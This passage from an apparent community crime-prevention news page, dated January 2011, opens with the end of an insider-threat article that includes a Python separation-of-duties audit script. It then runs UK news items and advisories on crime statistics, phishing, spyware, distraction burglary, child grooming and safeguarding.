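    System("corporate-vpn", frozenset({"ed"}), frozenset({"helpdesk1"})),
    System("hr-system", frozenset({"ed", "dba"}), frozenset({"auditor"})),
    System("email-server", frozenset({"ed"}), frozenset()),
    System("ecommerce-db", frozenset({"ed", "dba"}), frozenset({"auditor", "ed"})),
]


def direct_reports(person, manager_of):
    """People whose direct manager is `person`."""
    return {p for p, manager in manager_of.items() if manager == person}


def independent_reviewers(system, manager_of):
    """Reviewers who are neither a credential holder nor a holder's direct report."""
    conflicted = set(system.credential_holders)
    for holder in system.credential_holders:
        conflicted |= direct_reports(holder, manager_of)
    return set(system.log_reviewers) - conflicted


def audit(systems, manager_of):
    """Return (system, finding) pairs for separation-of-duties gaps."""
    findings = []
    for system in systems:
        if len(system.credential_holders) == 1:
            findings.append((system.name, "SOLE_CREDENTIAL_HOLDER"))
        if not system.log_reviewers:
            findings.append((system.name, "NO_REVIEWER"))
        elif not independent_reviewers(system, manager_of):
            # Someone reviews the logs, but only the admin or the admin's own staff.
            findings.append((system.name, "NO_INDEPENDENT_REVIEWER"))
    return findings


def lockout_exposure(systems):
    """Map each person to the systems that only they can administer."""
    exposure = defaultdict(list)
    for system in systems:
        if len(system.credential_holders) == 1:
            (holder,) = system.credential_holders
            exposure[holder].append(system.name)
    return {person: sorted(names) for person, names in exposure.items()}


if __name__ == "__main__":
    for name, finding in audit(SYSTEMS, MANAGER_OF):
        print(f"{name}: {finding}")
    for person, names in lockout_exposure(SYSTEMS).items():
        print(f"{person} alone controls: {', '.join(names)}")
```

The lockout list is the set of systems that would have to be re-keyed in one sitting if that person had to be removed, which is the position the retailer found itself in.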

Second, the company failed to do a thorough background check when it hired Ed. In CERT's research, 30% of the insiders who committed IT sabotage had a previous arrest history. In fact, any kind of false credentials should raise a red flag. Although the company had done a criminal background check on Ed (which was clean), it did not verify the credentials on his résumé, some of which were later found to be fraudulent. (He did not, for example, have the MBA that he claimed to have.)

Third, Ed's personality could have been viewed as a red flag. "He seemed to believe that he was smarter than everyone else in the room," says Linkous, who met Ed face-to-face by posing as an ERP vendor before the sting operation. Ed's arrogance reminded Linkous of the infamous Enron executives. "He was extremely confident, cocky and very dismissive of other people."

CERT has found that rogues often have prickly personalities. "We don't have any cases where, after the fact, people said, 'I can't believe it -- he was such a nice guy,'" says Cappelli.

(25th January 2011)


 

NORFOLK BOOSTS CHILD PROTECTION
(Norfolk Police, dated 21st January 2011)

Vulnerable children in Norfolk are set to benefit from more joined up working between agencies as the county council, police and partners look to create a Multi-agency Safeguarding Hub (MASH).

The MASH, which is set to be up and running by June, will initially bring staff from Norfolk County Council and Norfolk Constabulary under one roof, sharing information and responding quickly to child protection concerns. Community Services, health services and other agencies will also be involved at a later stage to better safeguard both vulnerable children and adults.

The MASH will mean that when a child protection enquiry comes into the county council, officers from different agencies will be able to immediately discuss the background of the case and make a joint visit, if necessary.

Although the police and county council already work closely together, with their partners, bringing the teams into one location will speed up communication and assessment.

Alison Thomas, Norfolk County Council's Cabinet Member for Children's Services, said: "Child protection continues to be one of our main priorities and we want to do all we can to keep children safe from harm.

"Currently in more than half of our referrals we need to speak to the police, particularly if there are issues with domestic violence or suspected abuse. By having a joint team we will be able to respond more quickly, avoid duplication and therefore provide a service that is more effective and offers the best value for money.

"In these challenging economic times we need to focus on acting swiftly to prevent problems from escalating, this reduces financial and human costs. We know that this model has been effective elsewhere in the country and we are keen to develop it within Norfolk.

"The success of this project is dependent on other partners coming on board and, although the hub will initially be made up of county council and police staff, we are hopeful other big partners, including those in the health service, will come on board as soon as possible.

"I was at a workshop in the summer when this project was discussed for the first time and I am passionate about its benefits and keen and excited to see it developed."

The scheme is based on a similar model in Devon, a county very similar to Norfolk and one of its statistical neighbours. There it has led to cases being processed much more effectively and there has been a reduction in formal referrals because issues have been addressed at an early stage.

Assistant Chief Constable Kevin Wilkins, of Norfolk Constabulary, said: "The recently finalised Norfolk Police Children & Young People Strategy reinforces the constabulary's commitment to build strong partnerships. The new multi-agency safeguarding Hub (MASH) realises true partnership working, with critical partners sharing systems, processes, people and intelligence in one location, reducing bureaucracy, time and cost.

"We know that young people who are exposed to risk factors including abuse, domestic violence, drugs and crime within the family unit are more likely to commit crime themselves. This MASH will enable the police, county council and other partners to deliver joint identification, assessment and action.

"This will ultimately improve outcomes for young people, providing more effective and targeted services to these groups by identifying early those who are most at risk of harm."

In Norfolk, the scheme is still in the early stages of development but it is hoped other agencies will come on board as the project develops. For the last two months a MASH project group has been meeting made up of representatives from Norfolk County Council (Children's and Community Services), police, health and probation. The MASH is likely to be based at a council building within Norwich.

(21st January 2011)


 

MURDER RATE LOWEST FOR 12 YEARS
(The Guardian, dated 20th January 2011)
http://www.guardian.co.uk

The murder rate in England and Wales has fallen from 644 to 619 over the last year to its lowest level for 12 years.

Official Home Office figures published today also show that overall crime fell 5% according to the British Crime Survey and by 7% according to police figures in the year to September 2010.

The latest set of quarterly crime figures suggest that the sustained long-term trend in the fall of crime since 1995 by more than 45% has continued despite the economic recession and the accelerating rise in unemployment.

The fall in the murder rate in the 12 months to September 2010 was accompanied by a 9% fall in gun crime and a 6% fall in knife offences. The 619 deaths recorded on the homicide index was the lowest since the 606 murders in 1997/98. In 2009/10, 421 victims were male and 198 were female.

The murder rate in England and Wales over the past 50 years rose steadily from around 300 a year in the early 1960s to more than 1,000 in 2002/03 when 172 deaths were attributed to the activities of Dr Harold Shipman. They have declined sharply since that peak with the fall in domestic violence providing part of the explanation for the decline.

The Home Office figures published today show that England and Wales are in the middle of the European murder league at 13.5 deaths per million population. Finland tops the table at 23.4, followed by Scotland at 21.4, and Ireland on 20 per million. Northern Ireland now has a murder rate well below Scotland at 15.2. Austria has the lowest murder rate in Europe at 6.1 per million.

Both sets of crime figures, the British Crime Survey, which measures people's experience of crime, and the police recorded crime figures show continued substantial falls in offences bringing the risk of becoming a crime victim to a 30 year low.

The 5% fall in the British Crime Survey estimate includes an 18% drop in the category of theft from the person, a 12% fall in other theft of personal property, a 15% fall in car crime and a 7% drop in vandalism. However the BCS also records a 16% rise in 'other household thefts', a 9% rise in burglary and a 3% rise in bicycle thefts.

The police recorded crime figures which show an even greater fall of 7% include an 18% drop in criminal damage, 14% fall in car crime, and a 7% drop in domestic burglary.

The only rise recorded on the police figures is a 7% increase in sexual offences but Home Office statisticians continue to urge caution over this figure citing under-reporting and recent police campaigns to improve recording.

The good set of crime figures are accompanied by BCS evidence of continuing falls in concerns about antisocial behaviour and levels of fear of crime.

Keith Bristow of the Association of Chief Police Officers said the figures showed the risk of becoming a crime victim remained at a 30 year low.

"Nationally we have been working to improve all areas of sex offence investigation, with a particular emphasis on rape in domestic abuse cases. We remain determined to bring to justice people who commit sexual offences and we are making significant progress in this critical area, particularly around giving victims confidence to come forward and report these crimes and we need them to do so," he said.

The Home Secretary, Theresa May, welcomed the statistics and confirmed moves designed to boost public confidence in the crime figures including moving them from the Home Office to an independent body: "Any reductions in crime are welcome, however levels are still too high and we know these statistics only offer a partial picture about the level of crime," she said.

"More needs to be done to bring crime down and we need to take bold action to restore public trust in crime statistics.

"That is why I have asked the national statistician to lead a review and why we are moving the publication of crime statistics out of the Home Office to an independent body.

"Improving public trust and confidence in crime statistics is crucial if we are to improve transparency and empower local communities to hold authorities to account."

(21st January 2011)


 

RECORDED CRIME CONTINUES TO FALL IN ENGLAND AND WALES
(BBC News, dated 20th January 2011)
www.bbc.co.uk

Recorded crime in England and Wales fell 7% in the year to the end of September 2010, official figures show.

There were falls in all main categories of crime, except sexual offences which were up by 7%.

But the British Crime Survey, which asks people about their experiences, rather than what the police record, suggested burglaries rose by 9%.

Officials said that was not statistically significant - but there was a 16% rise in all household theft.

The largest falls in police recorded crime were for criminal damage - down almost a fifth - and vehicle offences, such as break-ins, which fell 14%.

All violence recorded by the police fell 4% over the year and robberies fell by 5%. The BCS found no statistically significant change in the level of violence or household crime uncovered in its interviews.

There was also a decrease in people's perceptions of high levels of anti-social behaviour.

More than half of people said that police and local agencies, such as their councils, were dealing well with anti-social behaviour and local crime problems.

The number of homicides fell 4% to 619 in the year to the end of April 2010 - 25 fewer than the year before and the lowest number since 1997-98 when 606 were recorded.

As in previous years, about two-thirds of homicide victims were male, while about three-quarters of female victims knew the main suspect. The number of homicide victims under 16 went up from 49 to 52.

About a third of the killings involved a sharp instrument. And although the police recorded an overall 6% fall in firearms offences, the number of homicides from shootings rose marginally from 38 to 41.

Forty-one people were shot dead in 2009/10, up three on the year before.

Separate figures published earlier this week by the Metropolitan Police showed that in 2010 the number of homicides in London was at its lowest level since 1978.

Chief Constable Keith Bristow, head of crime for the Association of Chief Police Officers, said the data showed the risk of being a victim of crime remained at "a 30-year low".

"Nationally, we have been working to improve all areas of sex offence investigation, with a particular emphasis on rape in domestic abuse cases," he said.

"We remain determined to bring to justice people who commit sexual offences and we are making significant progress in this critical area, particularly around giving victims confidence to come forward and report these crimes and we need them to do so."

"The homicide rate also remains at its lowest level on the homicide index in 12 years. These overall results are a strong indication of the efforts of our workforce and others to keep people safe."

Review launched
 
Home Secretary Theresa May said that officials were now launching a review of how crime figures were collected and published in an attempt to improve public confidence.

The review would look at ways of cutting costs while making the figures more coherent.

"Any reductions in crime are welcome, however levels are still too high and we know these statistics only offer a partial picture about the level of crime," Mrs May said.

"More needs to be done to bring crime down and we need to take bold action to restore public trust in crime statistics.

"That is why I have asked the national statistician to lead a review and why we are moving the publication of crime statistics out of the Home Office to an independent body.

"Improving public trust and confidence in crime statistics is crucial if we are to improve transparency and empower local communities to hold authorities to account."

Recorded crime in England and Wales

% change in recorded crimes in the year to September 2010, compared with previous year. Source : British Crime Survey

Criminal Damage : down 18%
Domestic Burglary : down 7%
Other Burglary : down 10%
Offences against vehicles : down 14%
Other theft offences : no change
Robbery : down 5%
Violence against the person : down 4%
Sexual offences : up 7%
Drug offences : down 2%
Fraud and Forgery : down 1%
TOTAL RECORDED CRIME : DOWN 7%

(21st January 2011)


 

MORE PHISHING

I have just been looking through my Internet Service Provider's (ISP) spam filter for my e-mail account. There were eleven e-mails, all attempting to discover my banking details and passwords, over the last 2 weeks.

There were eight addressed to me as if I was a Lloyds Bank customer. The criminals' ploys within the e-mails ranged from someone having gained "unauthorized access to my online account", two "system errors" ( please verify details ), "difficulties verifying my account details" and lastly several "customers have been making a complaint about there records, please verify yours".

I also had a bogus NatWest Bank "Security Alert, access blocked to your account due to system error". Then a slightly more elaborate "Alert" from a false Halifax ( with a registered logo ) stating "we have temporary deactivate your account, provide your details for reactivation". Finally, a notice from a false HM Revenue and Customs: "you are eligible to receive a tax refund, please provide you banking details".

All of these bogus notifications came with links to websites where I could provide my details. These websites could steal my banking and other details ( ideal for identity theft ) or they could infect my computer with spyware so that the criminals could obtain other personal information.

Security software on your computer will not protect you against phishing attacks, other than saying that a piece of mail looks like spam ! If in any doubt about your account, call your bank direct using a known telephone number, not one provided in a bogus e-mail.

(21st January 2011)


 

HACKERS "WAIT BEHIND MILLIONS OF PORN PAGES"
(Metro, dated 18th January 2011 author Ross McGuiness )
www.metro.co.uk

Almost half of all online searches that result in a malicious web attack were for porn, a study has revealed.

Criminals lie in wait behind hundreds of thousands of porn sites, web security firm Symantec warned.

It said 44 per cent of search terms which led internet users to malicious websites were for adult entertainment.

The company said it detected more than 4.4million malicious web pages per month last year after observing more than 310,000 web domains found to be harmful.

Symantec also warned that a large recruitment drive for cyber criminals takes place on underground internet forums, where step-by-step attack kits are being sold for as little as £10.

Such kits are becoming easier to use, meaning cyber crime is no longer limited to those with advanced programming skills. 'In the past, hackers had to create their own threats from scratch, limiting the number of attackers to a small pool of highly skilled cyber criminals,' said Stephen Trilling, senior vice-president at Symantec.

'Today's attack toolkits make it relatively easy for even a malicious novice to launch a cyber attack.

'As a result, we expect to see even more criminal activity in this area and a higher likelihood that the average user will be victimised.'

The kits are software programs that can be used to help launch widespread attacks on networked computers.

Symantec said 61 per cent of malicious web attacks can be attributed to these types of kits. It said the Zeus kit posed a serious threat to small businesses, which have fewer safeguards, by stealing bank account details.

(21st January 2011)


 

DISTRACTION BURGLARY
(Based on information received, dated 17th January 2011)
 
The victims

These distraction burglaries appear to be predominately aimed at the elderly and vulnerable.

The Criminals' actions

- 38+ distraction burglaries have been committed in the period between Thursday 23rd September 2010 and Thursday 6th January 2011

- The female suspect calls upon the victim asking for the use of a pen and a piece of paper in order to leave a note for a relative who is a neighbour of the victim. The suspect will follow the victim into their home and further distract them as 1 or 2 male suspects enter and search for property. Although the pen and paper Modus Operandi is most commonly used, suspects also vary their methods.

- The presence of the female suspect typifies the series

- The males are sometimes quite brazen in their approach and when seen will either ignore the victim, leave, or attempt to further distract them.

Current tally of offences

16 London Boroughs ( Metropolitan Police District ) affected - Waltham Forest (4 offences), Ealing (3 offences), Bromley (3 offences), Sutton (2 offences), Croydon (2 offences), Greenwich (2 offences), Bexley Heath (2 offences), Edmonton (2 offences), Brixton (1 offence), Hounslow (1 offence), Kingston (1 offence), Merton (1 offence), Barking and Dagenham (1 offence), Hillingdon (1 offence), Ilford (1 offence), Colindale (1 offence)

Areas outside the Metropolitan Police District have also been affected - Sussex (2 offences), Thames Valley Police (5 offences), Hertfordshire (3 offences). The Metropolitan Police Intelligence unit is awaiting details of further potential offences from Essex and Bedfordshire.

Action to take

- Do not allow strangers into your home for whatever reason.
- Always check company representatives' ( utility companies etc ) pass cards before assuming they are genuine. Still do not allow entry if the visit is unsolicited ( you have not invited them to call ). Call their employer to check first, before allowing them entry.
- If a bogus caller calls, lock your door and call 999.
- If you have experienced a bogus call of the nature described above, call Crimestoppers (0800 555 111) anonymously. This will allow the Police to get a better understanding of how and where these criminals are operating.

(17th January 2011)


 

CHILDREN AS YOUNG AS 10 "GROOMED FOR SEX BY GANGS"
(BBC News, dated 17th January 2011)
www.bbc.co.uk

Children as young as 10 are being sexually exploited by organised gangs of men in cities across the UK, a leading charity says.

Barnardo's says it is working with more than 1,000 children who have been groomed, abused and trafficked for money, and the problem is growing.

It says a specific minister must be given formal responsibility for tackling the issue.

The Department for Education said it was determined to take action.

'Used and abused'
 
Barnardo's said it had 22 teams across the UK and all but one of them had come across organised child trafficking.

Anne Marie Carrie, Barnardo's new chief executive, told the BBC the problem was far more prevalent than it had previously thought and the 1,000 or so victims identified were "the tip of the iceberg".

She also said the average age of those abused had fallen from 15 to 13 in recent years.

"Children are being passed from man to man, home to home, city to city," she said. "It's the domestic trafficking of children for money. "This problem is getting worse in that it is getting more organised, certainly the grooming is becoming more organised using technology. "The children are as young as 10. These children are being used, abused and thrown away by organised gangs of men."

Earlier this month, two married British men of Pakistani origin were jailed in Derby for grooming and abusing several teenage girls. The former home secretary Jack Straw later claimed some Pakistani men believed white girls were "easy meat", but he was immediately criticised for his remarks.

Following the case, the Child Exploitation and Online Protection Centre (Ceop) announced that it had begun a study "to identify any patterns of offending, victimisation or vulnerability".

Ms Carrie said the children at the heart of the issue had "been forgotten as discussion has focused on the ethnicity of perpetrators in high-profile cases".

"Without a minister with overall responsibility the government response is likely to remain inadequate," she added.

A spokeswoman for the Department for Education said: "Child sexual exploitation is an appalling crime - it is a form of child sexual abuse and must not be tolerated.

"This is a complex problem and we are determined to tackle it effectively by working collaboratively right across government and with national and local agencies."

'Heartless'
 
Penny Nicholls, director of children and young people at The Children's Society, echoed Ms Carrie's remarks and urged the government to make a single government minister responsible for the issue.

She said: "Too many children and young people are being sexually exploited in the shadows of society, groomed in secret by heartless gangs of sexual predators or bogus boyfriends who shower vulnerable children with gifts and lure them to be horrifically exploited, sometimes for years on end."

What to look out for in our children

Ms Carrie said there were a few typical signs that parents should look out for.

"First of all, that children get gifts they couldn't possibly pay for on their own - they're given mobile phones and various things, they're taken out, they're treated [with] things.

"Secondly, that children begin to be a bit more quiet and secretive about their friends.

"And thirdly, that they have very suspicious sleep-overs. Suddenly, sleep-overs become more prevalent."

(17th January 2011)


 

POLICE PROMOTE CRIMESTOPPERS PRODUCT
( Police Oracle, dated 12th January 2011)
http://www.policeoracle.com

The Crimestoppers charity is celebrating its 23rd anniversary with the launch of its first product to help the public to protect their property and deter would-be perpetrators.

Tayside and Wiltshire Police are endorsing Property Protector, a clear liquid forensically engineered as a combination of micro-particles that retain fingerprint impressions when dabbed onto valuable items. These uniquely coded fingerprints can be exclusively registered to the rightful owner on a property registration database, thus enabling the tracing and identification of any stolen articles.

Michael Laurie, Chief Executive of Crimestoppers, said product sales would provide vital funds as well as protecting expensive gifts received over the festive season.

"These are challenging times and we need to find new ways to raise money whilst continuing our crime-fighting efforts. "With this product we are expanding our work to help people deter thieves and taking a more proactive and preventative approach in fighting crime," he added.

Lancashire Constabulary is also applying new forensic innovations with its Local Neighbourhood officer installing SelectaDNA, at a nursery school in Burnley, which has suffered a spate of five thefts in the last six months.

Thieves have caused significant damage estimated at around £1,000 as they broke into the buildings and managed to steal a scanner worth £400.

Officers have applied the forensic DNA tag to the interior and exterior of the nursery and issued a warning that anyone attempting to steal from the buildings can be traced.

SelectaDNA is a form of grease with its own code, which transfers onto skin, hair, clothes and shoes and cannot be washed away by anyone who comes into contact with it.

Suspects caught with the DNA attached to their body or items belonging to them are forensically linked to the scene of the crime.

Crimestoppers website : http://www.crimestoppers-uk.org/

Crimestoppers product webpage : http://www.crimestoppers-uk.org/crime-prevention/crimestoppers-property-protector

(15th January 2011)



POLICE BACKED WEB SUCCESS NETS SUPPORT
( Warwickshire Police )
http://onlinenews.warwickshire.police.uk

 

A domestic abuse support website in Warwickshire has proved so effective in getting the right help to people that a number of other local authorities have adopted the model.

WADA - Warwickshire Against Domestic Abuse (a group of over 30 agencies working together to tackle domestic abuse in Warwickshire) created the Talk 2 Someone website www.talk2someone.org in 2008. The secure website with secrecy controls brings together a range of support information for anyone affected by domestic abuse.

The site is regularly praised as an example of good practice and so far four local authorities in the country have been so impressed that they have adopted its layout and content.

Torbay Council and Devon County Council, Hertfordshire County Council, and Strathclyde Police Authority have all modelled their websites on Warwickshire's format.

Sue Ingram, Warwickshire's Domestic Abuse Manager and spokesperson for WADA was pleased that the website had impressed colleagues in other authorities. She said: "All the agencies involved in WADA inputted into the content of the Talk 2 Someone website which is both comprehensive but easy to navigate.

"This was recognised by the other authorities who have requested permission to adapt the style and content for their own areas, in many cases the translation has been verbatim.

"A unique feature of the website is the 'covering your tracks' section which prevents the site appearing in web browser histories and is important to victims who need to be extremely cautious when taking the first steps to leave an abusive relationship.

"The other authorities were also keen to duplicate this and we have agreed. We have been extremely pleased to share our knowledge and expertise across county boundaries in this way which will help more people to get access to the support they need."

Warwickshire County Councillor Richard Hobbs, Portfolio Holder for Community Protection added: "Through working together, agencies in Warwickshire all do a great job to support and protect people affected by domestic abuse and its far reaching consequences for families.

"It is pleasing to see some of this good practice acknowledged by other authorities and we are happy to work with them to help tackle the issue further afield."

WADA's Talk 2 Someone campaign provides a number of ways to seek help and information regarding domestic abuse including a free helpline number 0800 408 1552, available between 8am and 8pm Monday to Friday, and 9am to 5pm Saturday.

There is also a website - www.talk2someone.org.uk - which offers information and support for victims, families, friends and neighbours as well as perpetrators, who may be looking to turn things around. Last year 110 people sought counselling to change their behaviour.

(15th January 2011)


ROAD TRAFFIC POWERS EXTENDED FOR NO INSURANCE
(UK Government - Central Office for Information )
www.coi.gov.uk

New powers to tackle uninsured driving will come into force within months, Road Safety Minister Mike Penning has announced. Under the new powers it will be an offence to keep an uninsured vehicle, rather than just to drive when uninsured.

Currently every responsible motorist pays an average £30 each year within their premiums to cover crashes involving uninsured and untraced drivers. It is also estimated that uninsured and untraced drivers kill 160 people and injure 23,000 every year.

Mike Penning said: "Uninsured drivers push up premiums for other motorists and often drive with no regard for other road users, so it is vital that we do everything we can to keep them off the roads.

"More than 400 uninsured vehicles are already being seized by the police every day but it is simply not possible to catch every uninsured driver in this way. That is why we are bringing in these new powers which will help us to take targeted action while freeing up police time to deal with the hard core of offenders."

Ashton West, Chief Executive at the Motor Insurers' Bureau, said: "Today's news marks a significant step forward in the fight against uninsured driving. This means that as enforcement can take place for both keeping and driving a vehicle without insurance there will be no place for illegal motorists to hide.

"Continuous Insurance Enforcement (CIE) will complement and run alongside existing police roadside enforcement, which has already reduced uninsured driving by 20%."

Under the new system:

- The DVLA will work in partnership with the Motor Insurers' Bureau to identify uninsured vehicles

- Motorists will receive a letter telling them that their vehicle appears to be uninsured and warning them that they will be fined unless they take action

- If the keeper fails to insure the vehicle they will be given a £100 fine

- If the vehicle remains uninsured - regardless of whether the fine is paid - it could then be seized and destroyed.

Vehicles with a valid Statutory Off Road Notice (SORN) will not be required to be insured.

The Department for Transport today made the Commencement Order to make it an offence to be the registered keeper of a vehicle which does not have insurance, as well as regulations to support this. Further regulations will be made shortly, allowing the scheme to come into force in the Spring.

Latest estimates are that around 4% (around 1.4 million) of GB motorists drive uninsured. The penalty for driving without insurance is a maximum fine of £5,000 and 6-8 penalty points. Around 242,000 offenders are convicted for uninsured driving every year.

Measures already introduced in the Serious Organised Crime and Police Act 2005 gave police improved access to the Motor Insurers' Bureau database and powers to seize vehicles. In 2009 around 180,000 vehicles were seized.

The Road Safety Act 2006 provided the primary powers for a new offence of being the keeper of a vehicle which does not meet insurance requirements. Further secondary legislation is now being made to bring these provisions into force.

The Motor Vehicles (Insurance Requirements) Regulations 2010 make provision for regulations in support of the offence of being the registered keeper of a vehicle which does not have insurance cover. This instrument makes exceptions to that offence, provides that liability to conviction for the offence may be discharged by paying a fixed penalty of £100 and provides for the disclosure of information in connection with enforcement.

(15th January 2011)


 

INQUIRY INTO GROOMING OF GIRLS FOR SEX
(Metro, dated 10th January 2011 author Hayden Smith )
www.metro.co.uk

The sexual grooming of teenage girls is being investigated by the specialist child abuse unit following the conviction of two Asian men.

Experts from the Child Exploitation and Online Protection Centre (Ceop) are heading the inquiry, which comes after Mohammed Liaqat and Abid Saddique were jailed for abusing girls aged between 12 and 18.

Former home secretary Jack Straw sparked a backlash after claiming the conviction was evidence of a problem among young men in Britain's Pakistani community. Liaqat, 28, and Saddique, 27, were part of an Asian gang who befriended and groomed girls in Derby.

Mr Straw, who represents Blackburn, said such crimes were a 'specific problem' in the Pakistani community which needed to be 'more open' about the reasons.

While most sex offenders were white, 'there is a specific problem which involves Pakistani heritage men who target vulnerable young white girls', he told BBC2's Newsnight.

'We need to get the Pakistani community to think much more clearly about why this is going on and to be more open about the problems that are leading to a number of Pakistani heritage men thinking it is OK to target white girls,' Mr Straw said.

Young men were 'fizzing and popping with testosterone' but girls from the Pakistani community were 'off limits', leading them to seek other outlets for their desires, he suggested.

But fellow Labour MP Keith Vaz, who chairs the home affairs select committee, insisted the case was not symbolic of any 'cultural problem'.

'I don't think you can stereotype an entire community. What you can do is look at the facts of these national cases, give it to an agency, make a proper investigation,' he told BBC Radio 4's Today programme.

(15th January 2011)


 

iPHONES FUEL RISE IN STREET CRIME
(Evening Standard, dated 10th January 2011 author Justin Davenport)
www.thisislondon.co.uk

Thefts of the latest smartphones are driving a surge in street crime, Scotland Yard revealed today. New figures show that street robberies in London rose by more than eight per cent last year; driven largely by the popularity of expensive phones and gadgets such as iPhones, BlackBerrys and iPads; with the number of mobiles stolen in muggings shooting up by 22 per cent in 2010.

Police also highlighted the increasing theft of gold jewellery, primarily from Asian women, as they launched a campaign urging people to take care of their possessions.

There were a total of 31,841 street robberies recorded last year, an 8.3 per cent rise on the number in 2009. Between December 2009 and November 2010, 13,400 phones were snatched, costing an estimated total of £2.5million, with one in 10 muggings taking place near an Underground station.

Police warned that last year's increase in street crime was the first in four years, but emphasised the number of robberies was still low compared with 2006, when there were 43,063 offences.

Met commander Simon Pountain advised people to keep valuables hidden. He said: "Many robberies happen when people check their phones just after leaving Underground stations."

He added: "Every time we get the release of a so-called must-have gadget, such as the iPhone 4 or the latest BlackBerry, there are criminals who want them but do not want to pay for them."

Jewellery thefts rose by 14 per cent last year, with many involving gold jewellery being snatched in the street. Police saw a marked increase during the Hindu festival of Diwali, when the custom of wearing jewellery is popular among observers.

The rising value of precious metals has also fuelled demand for high-value items, according to the Met.

More patrols and covert teams are being deployed to target muggers in certain boroughs, after figures showed higher-than-average increases in street crime in Brent, Newham, Ealing, Hammersmith and Fulham, Southwark, Hackney and Waltham Forest.

(15th January 2011)


 

THE UNIQUE CHALLENGE OF SPYWARE
( Webroot Software Inc, Boulder, Colorado )
www.webroot.com

The following is an edited extract from a business explanatory document called a "White Paper". The purpose is to explain technical problems in as near layman's terms as possible. The text is nearly there, but there are some "techy bits".

The purpose of including this article is to remind every computer owner (residential or business) of the importance of maintaining security on their own machine. Very basic security software is free; the more efficient proprietary versions on special offer cost between £20 and £25 for 3 PCs. So why not share the cost with friends or family members?

As this White Paper states, spyware has been created by criminals for financial gain. Keylogging software ( which monitors passwords etc ) could be used to remove the contents of your bank account. For business users it could be details of contracts or plans to register a patent. How costly would that be ? I would expect more than £20 to £25.

Important Differences to Know about Spyware and Viruses

Introduction

At first comparison, spyware and computer viruses might appear to have more in common than not. They are both malicious programs, they both impact system stability, and the effects of both can range from being a nuisance to inflicting serious damage. They are also both programs that require specialized tools for their removal.

And while these two different types of malicious programs might closely resemble each other at first glimpse, there are significant differences:

• Unlike viruses, the motivations behind spyware are financial, which has driven rapid technical innovation and broad distribution.

• Spyware is curiously difficult to locate for research, requiring specialized, proactive methods for discovery.

• Removing spyware is especially complicated and problematic because newer versions are highly adept at remaining on a system.

• The business impacts of spyware are greater, as it compromises privacy, threatens assets and affects productivity beyond even the damage caused by viruses.

The bottom line is that spyware presents a unique and serious problem that requires its own dedicated defenses. As spyware rapidly proliferates today, its well-funded developers are creating increasingly sophisticated versions, and it is clear that solutions devoted to handling the intricacies of spyware are necessary.

In this paper we will closely examine the differences between spyware and computer viruses. The first line of defense is education, and understanding the unique threat spyware poses is the first step in a practical plan for protection.


A Look at the Differences Between Spyware and Viruses

Designed to Hide

One important way spyware is distinguished from viruses is discoverability. Antivirus vendors are able to deploy passive techniques for identifying new viruses, such as "honey-nets" that capture the malicious programs as they replicate themselves across the Internet. Because antivirus vendors can rely on these more passive research methods, they have not been as prepared for the active approach necessary to combat the unique challenges of spyware detection.

In order to maintain a definitions database that will effectively defend its users from newly released forms of spyware, an anti-spyware provider must actively seek out new threats and their source location. Keeping up with hundreds of adware companies and thousands of spyware writers is a daunting task.

Furthermore, it is becoming even more specialized as increasingly advanced forms of spyware morph into new variations requiring more sophisticated approaches. There are several approaches to spyware research, but each is technically challenging and resource intensive. One of the more interesting approaches used involves using webcrawler technology to find new threats before they can infect end users. This automated scanning of the Internet to identify new forms of spyware involves proprietary technologies and a specific understanding of spyware and its unique properties.

Difficult to Remove

Once installed on a system, the presence of spyware on the PC can be insidious. While viruses typically take the form of a single executable and might affect a few registry entries, spyware typically impacts multiple registry (*) entries and potentially leaves dozens of application files spread across the hard drive or deep within the hardware.

Sophisticated techniques are required to locate and remove these many components created by spyware applications. In addition, spyware is becoming increasingly sophisticated in its staying power. New spyware programs use complex approaches, such as running separate processes that monitor each other. These programs are capable of reinstalling components and repopulating registry entries that have been removed. They are also capable of randomizing various elements of the program so that they leave a different footprint and are harder to track. To further complicate matters, if left unchecked many spyware applications are capable of downloading additional programs.

When faced with more difficult removal efforts, antivirus programs are not sufficient. Even just to remove some viruses, leading anti-virus vendors have had to build completely separate custom removal tools.

Removing aggressive spyware is even more difficult. To be effective, an anti-spyware program must engage in the complex, multi-step process of extracting the spyware components and removing the traces left behind throughout the system. Spyware removal requires highly specialized techniques that are different from the fundamental processes performed by antivirus software.

Different Impact

Another important difference between spyware and viruses is the impact they make on computers and their users. Viruses are developed to cause mischief by clogging networks, bringing down systems, or in some cases, deleting information. Spyware, however, is designed to execute even more malicious objectives. In the hands of cyber criminals, spyware's impact can be devastating, enabling them to violate personal privacy, access proprietary information, and steal financial assets. This was the case in a recent headline-making cyber theft in which spyware was used to steal $423 million from Sumitomo Mitsui bank.


Unique Distribution

The way in which spyware proliferates is also different from viruses. For one, there are often more variants. While viruses may have a few variants or encourage copycat efforts, spyware is often programmatically designed to spin off its own variations, which can lead to a substantially greater number of spyware programs to contend with.

In addition, while viruses are typically designed to spread themselves openly and obviously across networks, spyware is generally unwittingly downloaded and installed by computer users. Spyware's focus is on stealthy delivery, and thus it proliferates more "silently", which makes it more difficult to determine the scope of its dissemination. While antivirus solutions are focused on combating the more visible spread of viruses and worms, a spyware protection solution must be adept at exposing stealthy delivery methods.

Financially Motivated

Another important differentiator between spyware and viruses is the motivation for their creation in the first place. Viruses are often created by individuals or small groups with the intent of causing a nuisance, or testing their programming skills at the expense of others. Spyware, on the other hand, is financially motivated and represents a growing industry estimated at $2.5B.

Backed by legitimate organizations with substantial financial resources, spyware is becoming increasingly sophisticated, and increasingly difficult and complex to manage. With a strong financial motivation behind its advancement, spyware protection will continue to require highly specialized techniques.

Note
(*) The Registry is the section within the Windows operating system that notes what programmes are working on a computer and how they interact with other programmes (Simplified description).

(15th January 2011)




POLICE TO HELP VULNERABLE VICTIMS OF ANTI-SOCIAL CRIME
(BBC News, dated 4th January 2011)
www.bbc.co.uk

Eight police forces in England and Wales have launched a project to help vulnerable victims of antisocial behaviour.

 

The seven-month Home Office pilot is designed to help quickly identify and protect victims most at risk. It will change the way police respond to calls and introduce a new system to more effectively log complaints.

It follows the death of Fiona Pilkington who killed herself and her disabled daughter after years of abuse. They had suffered 10 years of torment at the hands of a gang of youths who taunted them and pelted their home in Leicestershire with stones, eggs and flour.

The projects, in Avon and Somerset, Cambridgeshire, Leicestershire, Lincolnshire, London, South Wales, Sussex and West Mercia, will run until July.  They will focus on creating an effective call-handling system, which will better identify the most vulnerable victims, and improve information-sharing between the police and other agencies like social services.

They will also engage with communities to "clearly set out the issues which are causing the most harm to individuals and neighbourhoods" and how they will be tackled, the Home Office said.

